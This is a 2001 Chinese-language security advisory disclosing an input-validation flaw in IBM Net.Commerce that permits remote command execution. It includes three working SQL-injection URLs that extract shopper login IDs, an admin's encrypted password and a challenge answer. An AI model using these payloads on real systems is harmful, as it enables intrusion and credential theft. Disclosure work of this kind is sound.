IBM Net.Commerce 存在远程命令可执行漏洞发布时间:2001-02-12 更新时间:2001-02-12 严重程度:中 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 受影响系统:详细描述 IBM的Net.commerce电子商务平台支持多个宏,在用户提供的输入中没有进行合法性检查,一个不正常的脚本提送给有漏洞的脚本可以让远程用户获得一些系统的信息,包括任意执行命令给Net.Commerce。远程用户将以DB2INST1帐户的权利执行任意命令。 测试代码 攻击实例: http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A' 获得加密的密码: http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin' 获得密码文件: http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin' 解决方案 尚无 相关信息 |
